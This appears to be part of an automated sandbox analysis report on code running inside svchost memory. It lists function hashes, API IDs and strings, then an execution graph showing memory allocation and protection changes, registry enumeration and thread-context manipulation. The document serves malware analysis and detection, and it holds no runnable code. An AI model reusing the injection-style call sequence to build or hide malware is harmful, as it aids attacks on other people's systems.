                                                • Instruction ID: ef55fef685f6e63ea46eb99b583f4df4a61f4aad81c91252b5b54e42dce67506
                                                • Opcode Fuzzy Hash: 52f3b0a83a9fc5b22f41d8404852d8b34c9dcd72dd37eace61d9b8d2680426a2
                                                • Instruction Fuzzy Hash: B4D1C876608B8882EA70DB0AE49C35A77E4F389F85F140216EACE57BA5CF3CC545CB41
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID: dialer
                                                • API String ID: 756756679-3528709123
                                                • Opcode ID: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction ID: 7c7cd99321ed215743737de429bd94f26eb07e2b3972f15d08d9bfc67b5388df
                                                • Opcode Fuzzy Hash: 5b923b6f3d4b051af17e4e8faeca1d1198f97f66eaed8709a0f00f88d373bc4e
                                                • Instruction Fuzzy Hash: 9431A221B01B5197EB19EF16A80D66977F8FB4AF95F0C4020DE4A27B54EF3CC4A98781
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                • String ID:
                                                • API String ID: 517849248-0
                                                • Opcode ID: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction ID: 331f07f1c56a884374ab0073a6da1fef4a138c943355aa0f21201652e5049059
                                                • Opcode Fuzzy Hash: bec16919e3b07d6ab1f360bf5186f0ec190c680636fdb39b4f696954ffc34d04
                                                • Instruction Fuzzy Hash: 20015731B00A4197EA10EB12A85C35967A9FB89FD5F488435CE8A53754DF3CC98AC341
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                • String ID:
                                                • API String ID: 449555515-0
                                                • Opcode ID: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction ID: a03370b0f1b99888e82360213d0c999877f66a98b6860f64e43c67a9d98e6456
                                                • Opcode Fuzzy Hash: e4252fc9f6451678ca3b672aa508af9be8436cc55dc462e8819adcbe9d266895
                                                • Instruction Fuzzy Hash: 74111B65B1174087FB25DB22E80E75676A8BB4AF91F080425CA4B27754EF3DC50C8742
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: 461482e568c637631849338c705f3eaada8f21a57059969d29b558982f2f280f
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: B5517632B116048BEB18CE25E44CB5937EDF346F99F598124DA1B67788EF39C849C782
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 2395640692-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: 8cba797f111996638c92f3be6104cd123b816c25eff81f7ebdcd395d45cc5ed0
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: B3317432B0064097E618DF22E84CB1937A9F346F99F098118EA5B27785CF39C949C786
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: FinalHandleNamePathlstrlen
                                                • String ID: \\?\
                                                • API String ID: 2719912262-4282027825
                                                • Opcode ID: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction ID: 2b181269923a5af29811523aae9a9715c4d76484b532f06836e06ca17225f93c
                                                • Opcode Fuzzy Hash: 16112503ebd4bbaf0721a34979430d9d9890d46ad4397212c59debcfc05cbbbd
                                                • Instruction Fuzzy Hash: F1F04F72704A4193EB20DB25F49D399B7B9F745F99F888030CA8A57954DF2CC68DCB41
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: CombinePath
                                                • String ID: \\.\pipe\
                                                • API String ID: 3422762182-91387939
                                                • Opcode ID: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction ID: f5a1980f7c610e79436a11b398841ed97fec700dc0cbf7dd1e7166cb89351677
                                                • Opcode Fuzzy Hash: a10b9fbf5d2c898f7c9b708695815e9cf74f4df3f8d5b839e299d2cca4937a3b
                                                • Instruction Fuzzy Hash: 88F08220B04B8093EA00DB13F90E1597668AB4AFE1F0C8131DE9B27B28CF2CC49AC301
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                • Opcode ID: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction ID: 4df176fab3eac4105edad8b9749e0397101cff3075760181ddbd3ecdbcb94a2e
                                                • Opcode Fuzzy Hash: 9217264d43014ce808c99de8a8145fbe135b698a21aa29953e209d5462850717
                                                • Instruction Fuzzy Hash: 22F01261B1164493EF589B60F88D36937A8EF49FD5F4C2419950B57674DF2CC58CC702
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction ID: 90785e1c39c9657ebb0966d5b819a78446fd2ce121af7c2d17050c564d8ee3bb
                                                • Opcode Fuzzy Hash: 065eb2a24c7300192409b1f4bca8757e198c759726111ad2bde78b52490ea3d6
                                                • Instruction Fuzzy Hash: 3B02D932619B84C7E760CB59F49835AB7A4F3C6B91F141015EA8E97BA8DF7CC488CB41
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                • String ID:
                                                • API String ID: 2210144848-0
                                                • Opcode ID: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction ID: 8aa0878b4f97bec40b88aa89525aaa0c74d8548bc027b4084bccae2cd63156eb
                                                • Opcode Fuzzy Hash: 4bcbd420be841bafcf1cb86917f82a61becb6801fc8ef256a9047459a88e7092
                                                • Instruction Fuzzy Hash: E481D132F106408AFB509B61885E3AD3AA9F746F94F4C4215DE4BB7A95DF3C846AC312
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentThread
                                                • String ID:
                                                • API String ID: 2882836952-0
                                                • Opcode ID: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction ID: fa1833fee047542339fb4bee660ae3a7f67998ead17e02992f85dbf256e6eae3
                                                • Opcode Fuzzy Hash: 94d32eef5ebe536b0a0adfa3e0b32a568b4410008b4bb6dfd84b7e083660618c
                                                • Instruction Fuzzy Hash: 5061C736A19B80C7E760CB15E44C31AB7E8F38AB45F141115EA8E53BA8CF7CC548CB46
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 78f1e09ebe91069fde2cfe5cecec6e314050ca4ced6c13427bf44ac0d6cc4aa3
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 8C119E36F58A0003F6A81178E55F3A97069AB77B74F1C0724AA7B276DA8F5C8C4E4202
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2938691158.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a6612d0000_svchost.jbxd
                                                Similarity
                                                • API ID: _set_statfp
                                                • String ID:
                                                • API String ID: 1156100317-0
                                                • Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction ID: 282d6ea6c085c75b559c4eecab295731d6df6bcc1aeec4f266239e96254006d3
                                                • Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
                                                • Instruction Fuzzy Hash: 5911A322F54AC003F6641375E45E36912BC6B57B74F4C0634AA7607BD78F1C8EC98102
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentProcessProtectVirtual$HandleModule
                                                • String ID:
                                                • API String ID: 1092925422-0
                                                • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction ID: 5de2aea850e14d70eb11c96f7812abb78d1b7e8127be60e8cf67db41b6ecfb1c
                                                • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                                • Instruction Fuzzy Hash: 8011182AB04B4087EB54DB11E40D76976A8FB4AF95F080029DE8A17794EF3DC5088741
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2938691158.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a6612d0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction ID: a2496d3c7ddad3d354ece01c9d6e321c93b1a255c05b5a6eb78cde2e634084ab
                                                • Opcode Fuzzy Hash: a12096fde07cdb9e3353675e9d74aeeedb8b2868f95cbc04e37ad4e594267797
                                                • Instruction Fuzzy Hash: 6851AF32F126408BDB14CF25E84CB58339DFB42FA8F59A124DA4643788DF38D9C99746
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2938691158.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a6612d0000_svchost.jbxd
                                                Similarity
                                                • API ID: CurrentImageNonwritable__except_validate_context_record
                                                • String ID: csm$f
                                                • API String ID: 3242871069-629598281
                                                • Opcode ID: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction ID: 12aedaf196ce0c41363de339bde528673567e858345642c02141eeaadbb587cc
                                                • Opcode Fuzzy Hash: 9d9690251bde7e8cf310a92dbdf710b9b231990aa6f8d8297185bd8ead255550
                                                • Instruction Fuzzy Hash: D2316A76B1168097E7149F21E84CB5937ACFB42F98F5AA014EE5A07788CF3CC989D706
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$Free
                                                • String ID:
                                                • API String ID: 3168794593-0
                                                • Opcode ID: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction ID: e67698bfd7912cac5bd800f33a611c970f87d1252693b1fcbc527840f8256d78
                                                • Opcode Fuzzy Hash: 5f7cef85691391bfd1f64b5ed8b2db0144129af346a3a3b2b5e725a5d1a6a2a2
                                                • Instruction Fuzzy Hash: C6115B72A14B8893E754EF66A84D21A77B4F78AF94F084029EB8B23755DF3CC0598741
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction ID: 8935ae60fd7875c6a519039d36bc47552768e08d90f04f0b2b20aad67cf4645d
                                                • Opcode Fuzzy Hash: 6e49d471cca68daba176b61e5ee439cd114eed484b1fe0d421767ac79cd7910d
                                                • Instruction Fuzzy Hash: 0371B236B0078147EB64DA369A4C3AA67D8F746FC5F480016DE4B63B99DF39C608C782
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: FileType
                                                • String ID: \\.\pipe\
                                                • API String ID: 3081899298-91387939
                                                • Opcode ID: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction ID: d7711c9e83a1894a29492c74cbdb36065285409975d89d68dcb66489ac376cc9
                                                • Opcode Fuzzy Hash: afcb3e66faa42eb2bcf346096e8e020fbdcda90173b34b97db97a4810a61a98e
                                                • Instruction Fuzzy Hash: 4351EB32B0478583E6349E399A5C36AA6D9F387F91F1D0025CD8B23B99CF7DC4098B81
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: ErrorFileLastWrite
                                                • String ID: U
                                                • API String ID: 442123175-4171548499
                                                • Opcode ID: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction ID: 26148cedc7e7393984548b0d27a179502ff655e41e471cbadbe1c26882793d0d
                                                • Opcode Fuzzy Hash: a13edceeabc266f7553562aa63bd5b4e25a5c0a5c0c842b56dee7ecd57ba2728
                                                • Instruction Fuzzy Hash: 5941E632B14A4082EB20DF25E44D39AB7A4F389BD4F584021EE8E97788DF3CC455CB41
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: Stringtry_get_function
                                                • String ID: LCMapStringEx
                                                • API String ID: 2588686239-3893581201
                                                • Opcode ID: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction ID: 5299850c71e00a34e9ab231a5fc861aac41e51d00e5afb72f0c3f518ed32c545
                                                • Opcode Fuzzy Hash: 8d086b69a67710f16bbac061c243311228bfa9ac644515e4c5b930ef6255b9c6
                                                • Instruction Fuzzy Hash: 50110B36708BC086DB60CF15B44829AB7A8F7C9F94F584126EE8E53B59DF3CC4548B40
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: ExceptionFileHeaderRaise
                                                • String ID: csm
                                                • API String ID: 2573137834-1018135373
                                                • Opcode ID: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction ID: bd88ddc39b80fbe161f04c61a485dee9a5def588c444f122c90a1622165b6d6c
                                                • Opcode Fuzzy Hash: 9d9897ce25571c28e51806bf44cef2494793ace286fcfb8ca6bb858d3561ec5c
                                                • Instruction Fuzzy Hash: 8F113A32608B8082EB618F15E4483597BE8F789F98F1D4220DE8E17B68DF3DC559CB41
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                • String ID: InitializeCriticalSectionEx
                                                • API String ID: 539475747-3084827643
                                                • Opcode ID: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction ID: b4c49a4aae0989cb96510c2edbffded8341e8a649ebced7b63add6fe05655295
                                                • Opcode Fuzzy Hash: 84d4d9e5c8567b0c470c1df2abda769c6c41ef7958af45e9a0e3fb38bbb318e4
                                                • Instruction Fuzzy Hash: 6EF0E221B10780C3EB059B45F80D29433A8AB89FA4F8C5021A94F23B55CF3CC89DCB42
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: Valuetry_get_function
                                                • String ID: FlsSetValue
                                                • API String ID: 738293619-3750699315
                                                • Opcode ID: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction ID: b14d3d8136249e5ef12ebf06390420993942a240dd072e76d802ddbc2ef96508
                                                • Opcode Fuzzy Hash: 50ddf312d192e0080d8f7be73491643e669436d55e40d94a578a073710abe0d4
                                                • Instruction Fuzzy Hash: 9DE09261B0064093EF059B50FC0E69433AABB89F95F8C9026E90B27795CF3CC85DC742
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2938691158.000002A6612D0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A6612D0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a6612d0000_svchost.jbxd
                                                Similarity
                                                • API ID: try_get_function
                                                • String ID: November$October
                                                • API String ID: 2742660187-1636048786
                                                • Opcode ID: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction ID: 34b657edabca4fb7c16a9ca5f99ee603017589a98796ca4246c539c293f6b05d
                                                • Opcode Fuzzy Hash: fdce6644ec914193c36bb80fdc4676b7f0aefee418b5ba3fb3fb30fec7b157a7
                                                • Instruction Fuzzy Hash: 50E09261F005C593EE049B62F44C2E4622D9F85F40F5D5125D9190B252DF3CC9DEC342
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$Process$AllocFree
                                                • String ID:
                                                • API String ID: 756756679-0
                                                • Opcode ID: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction ID: 12a56478c837c39c5216bc8345ce5163ad79e49cf0720a9169c88b3f3c9e6f16
                                                • Opcode Fuzzy Hash: 3779bcfafb90e2edd239bdf2c4b5cd58a413f829d06d4561fa4d45091366f8f0
                                                • Instruction Fuzzy Hash: 0D216032B04B8082EA519F59A40C25AF7F4FB85F99F194124DE8E57B14EF7CC54AC741
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000019.00000002.2939914361.000002A661300000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A661300000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_25_2_2a661300000_svchost.jbxd
                                                Similarity
                                                • API ID: Heap$AllocProcess
                                                • String ID:
                                                • API String ID: 1617791916-0
                                                • Opcode ID: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction ID: 16ddd67762c4d4c4f8100b4d624632db3f00bd7c2fc12c005352baca9613edce
                                                • Opcode Fuzzy Hash: 8b038beba27963a8280261039ce2f03ebd498cc74250c16b652da3202c115688
                                                • Instruction Fuzzy Hash: 7AE0C9B1B5160087E704EB66D81D3597AE5EB89F61F498024C94A07350DF7D8499C751

                                                Execution Graph

                                                Execution Coverage:1.7%
                                                Dynamic/Decrypted Code Coverage:95.1%
                                                Signature Coverage:0%
                                                Total number of Nodes:122
                                                Total number of Limit Nodes:16
                                                execution_graph 14015 2baaedb3b99 14016 2baaedb3ae6 14015->14016 14017 2baaedb3b36 VirtualQuery 14016->14017 14018 2baaedb3b6a VirtualAlloc 14016->14018 14019 2baaedb3b50 14016->14019 14017->14016 14017->14019 14018->14019 14020 2baaedb3b9b GetLastError 14018->14020 14020->14016 14020->14019 14021 2baaedb1c28 14026 2baaedb1650 GetProcessHeap HeapAlloc 14021->14026 14023 2baaedb1c3e Sleep SleepEx 14024 2baaedb1c37 14023->14024 14024->14023 14025 2baaedb15c0 StrCmpIW StrCmpW 14024->14025 14025->14024 14070 2baaedb1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14026->14070 14028 2baaedb1678 14071 2baaedb1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14028->14071 14030 2baaedb1689 14072 2baaedb1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14030->14072 14032 2baaedb1692 14073 2baaedb1274 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 14032->14073 14034 2baaedb169b 14035 2baaedb16b6 RegOpenKeyExW 14034->14035 14036 2baaedb16e8 RegOpenKeyExW 14035->14036 14037 2baaedb18ce 14035->14037 14038 2baaedb1727 RegOpenKeyExW 14036->14038 14039 2baaedb1711 14036->14039 14037->14024 14040 2baaedb1762 RegOpenKeyExW 14038->14040 14041 2baaedb174b 14038->14041 14081 2baaedb12c8 RegQueryInfoKeyW 14039->14081 14044 2baaedb1786 14040->14044 14045 2baaedb179d RegOpenKeyExW 14040->14045 14074 2baaedb104c RegQueryInfoKeyW 14041->14074 14048 2baaedb12c8 16 API calls 14044->14048 14049 2baaedb17d8 RegOpenKeyExW 14045->14049 14050 2baaedb17c1 14045->14050 14051 2baaedb1793 RegCloseKey 14048->14051 14053 2baaedb1813 RegOpenKeyExW 14049->14053 14054 2baaedb17fc 14049->14054 14052 2baaedb12c8 16 API calls 14050->14052 14051->14045 14057 2baaedb17ce RegCloseKey 14052->14057 14055 2baaedb1837 14053->14055 14056 2baaedb184e RegOpenKeyExW 14053->14056 14058 2baaedb12c8 16 API calls 14054->14058 14059 2baaedb104c 6 API calls 14055->14059 14060 2baaedb1872 14056->14060 14061 2baaedb1889 RegOpenKeyExW 14056->14061 14057->14049 14062 2baaedb1809 RegCloseKey 14058->14062 14063 2baaedb1844 RegCloseKey 14059->14063 14064 2baaedb104c 6 API calls 14060->14064 14065 2baaedb18c4 RegCloseKey 14061->14065 14066 2baaedb18ad 14061->14066 14062->14053 14063->14056 14067 2baaedb187f RegCloseKey 14064->14067 14065->14037 14068 2baaedb104c 6 API calls 14066->14068 14067->14061 14069 2baaedb18ba RegCloseKey 14068->14069 14069->14065 14070->14028 14071->14030 14072->14032 14073->14034 14075 2baaedb11b5 RegCloseKey 14074->14075 14076 2baaedb10b9 14074->14076 14075->14040 14076->14075 14077 2baaedb10c7 RegEnumValueW 14076->14077 14079 2baaedb111c 14077->14079 14078 2baaedb1149 GetProcessHeap HeapAlloc 14078->14079 14079->14075 14079->14077 14079->14078 14080 2baaedb117f GetProcessHeap HeapFree 14079->14080 14080->14079 14082 2baaedb1334 GetProcessHeap HeapAlloc 14081->14082 14083 2baaedb1499 RegCloseKey 14081->14083 14084 2baaedb1485 GetProcessHeap HeapFree 14082->14084 14085 2baaedb135d RegEnumValueW 14082->14085 14083->14038 14084->14083 14089 2baaedb13af 14085->14089 14087 2baaedb13dd GetProcessHeap HeapAlloc 14087->14089 14088 2baaedb142f lstrlenW GetProcessHeap HeapAlloc StrCpyW 14088->14089 14089->14084 14089->14085 14089->14087 14089->14088 14090 2baaedb1413 GetProcessHeap HeapFree 14089->14090 14091 2baaedb1554 14089->14091 14090->14088 14092 2baaedb15a4 14091->14092 14093 2baaedb156e 14091->14093 14092->14089 14093->14092 14094 2baaedb1585 StrCmpIW 14093->14094 14095 2baaedb158d StrCmpW 14093->14095 14094->14093 14095->14093 14096 2baaed82908 14098 2baaed82936 14096->14098 14097 2baaed82aa7 14098->14097 14099 2baaed82994 VirtualAlloc 14098->14099 14099->14097 14101 2baaed829b8 14099->14101 14100 2baaed82a2b LoadLibraryA 14100->14101 14101->14097 14101->14100 14102 2baaedb562d 14104 2baaedb5634 14102->14104 14103 2baaedb569b 14104->14103 14105 2baaedb5717 VirtualProtect 14104->14105 14106 2baaedb5743 GetLastError 14105->14106 14107 2baaedb5751 14105->14107 14106->14107 14108 2baaedb2a7c 14110 2baaedb2ac1 14108->14110 14109 2baaedb2b20 14110->14109 14112 2baaedb3930 14110->14112 14113 2baaedb3952 14112->14113 14114 2baaedb393d StrCmpNIW 14112->14114 14113->14110 14114->14113 14115 2baaedb5dd0 14116 2baaedb5ddd 14115->14116 14117 2baaedb5de9 14116->14117 14123 2baaedb5efa 14116->14123 14118 2baaedb5e1e 14117->14118 14119 2baaedb5e6d 14117->14119 14120 2baaedb5e46 SetThreadContext 14118->14120 14120->14119 14121 2baaedb5f21 VirtualProtect FlushInstructionCache 14121->14123 14122 2baaedb5fde 14124 2baaedb5ffe 14122->14124 14137 2baaedb44c0 14122->14137 14123->14121 14123->14122 14133 2baaedb4ed0 GetCurrentProcess 14124->14133 14126 2baaedb6003 14128 2baaedb6057 14126->14128 14129 2baaedb6017 ResumeThread 14126->14129 14141 2baaedb7a20 14128->14141 14130 2baaedb604b 14129->14130 14130->14126 14132 2baaedb609f 14134 2baaedb4eec 